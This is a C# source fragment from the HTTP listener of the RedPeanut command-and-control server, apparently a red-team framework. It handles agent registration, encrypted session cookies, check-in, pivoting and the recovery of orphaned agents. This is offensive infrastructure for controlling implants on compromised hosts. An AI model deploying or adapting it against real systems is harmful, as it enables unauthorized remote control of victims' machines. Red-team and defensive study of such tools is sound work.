private IAgentInstance CreateAgentInstance(C2Server server, string agentid, string agentPivotid, string serverkey,
string address, int port, int framework, int profileid, byte[] sessionkey = null, byte[] sessioniv = null)
{
IAgentInstance agent = new AgentInstanceHttp(server, agentid, serverkey, address, port, framework, profileid, sessionkey, sessioniv);
//If agentidreq come from a pivoter set the prop
if (!string.IsNullOrEmpty(agentPivotid))
{
IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentPivotid);
agent.Pivoter = agentInstance;
}
return(agent);
}
private ActionResult StepOne(StreamReader reader)
{
AgentIdReqMsg agentidrequest = null;
try
{
string line_t = reader.ReadToEnd();
Dictionary <string, string> args = GetParsedArgs(line_t);
var line = DecryptMessage(RedPeanutC2.server.GetServerKey(), args.GetValueOrDefault(Paramname));
agentidrequest = JsonConvert.DeserializeObject <AgentIdReqMsg>(line);
}
catch (Exception)
{
// Someting goes wrong decrypting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
try
{
IAgentInstance agent = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), agentidrequest.address, agentidrequest.port, agentidrequest.framework, Profileid);
//If agentidreq come from a pivoter set the prop
if (!string.IsNullOrEmpty(agentidrequest.AgentPivot))
{
IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentidrequest.AgentPivot);
agent.Pivoter = agentInstance;
}
RedPeanutC2.server.RegisterAgentInbound(agent.AgentId, agent);
string response = CreateMsgAgentId(agent, RedPeanutC2.server.GetServerKey(), Profileid, agentidrequest.framework);
//Set cookie
SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), agent.AgentId), 0);
Console.WriteLine("\n[*] Agent {0} connected", agent.AgentId);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(response));
}
catch (Exception e)
{
// Operation error
Console.WriteLine("[x] Operation error {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
public ActionResult <string> Post()
{
//Console.WriteLine("[*] Post request");
//Step 1 agent
if (string.IsNullOrEmpty(GetCookieValue("sessionid")))
{
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
return(StepOne(reader));
}
else
{
// Request has a cookie
// Must be RC4 encrypted with serverkey
// No other sec check over the cookie
// Body must be entrcypted with session shared key iv pair
try
{
string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));
//Check if agentid exists in any state
IAgentInstance agent = null;
if (RedPeanutC2.server.GetAgents().ContainsKey(decriptedAgentid))
{
// Agent registered as active check message type Response, AgentIdReqMsg,
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
agent = RedPeanutC2.server.GetAgents().GetValueOrDefault(decriptedAgentid);
return(PostResponse(reader, agent));
}
else
{
if (RedPeanutC2.server.GetInboundAgents().ContainsKey(decriptedAgentid))
{
// Cookie present and agent is in inboud queue post need to be Aes ChekIn
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
agent = RedPeanutC2.server.GetInboundAgents().GetValueOrDefault(decriptedAgentid);
return(CheckIn(reader, agent));
}
else
{
//Check if agent is orfaned
AgentInstance agentInstance = dbContext.Agents.FirstOrDefault <AgentInstance>(s => s.agentid.Equals(decriptedAgentid));
if (agentInstance != null)
{
//
agent = CreateAgentInstance(RedPeanutC2.server, agentInstance.agentid,
agentInstance.agentPivotid, RedPeanutC2.server.GetServerKey(), agentInstance.address, agentInstance.port,
agentInstance.framework, Profileid, agentInstance.sessionkey, agentInstance.sessioniv);
AgentInstanceHttp agenthttp = (AgentInstanceHttp)agent;
agenthttp.Cookie = GetCookieValue("sessionid");
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
return(CheckIn(reader, agenthttp));
}
else
{
// Agent does not exeists corrupted session or request not legitimate
Console.WriteLine("[x] Agent does not exeists corrupted session or request not legitimate");
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
}
}
catch (Exception e)
{
// Operation error
Console.WriteLine("[x] Operation error {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
}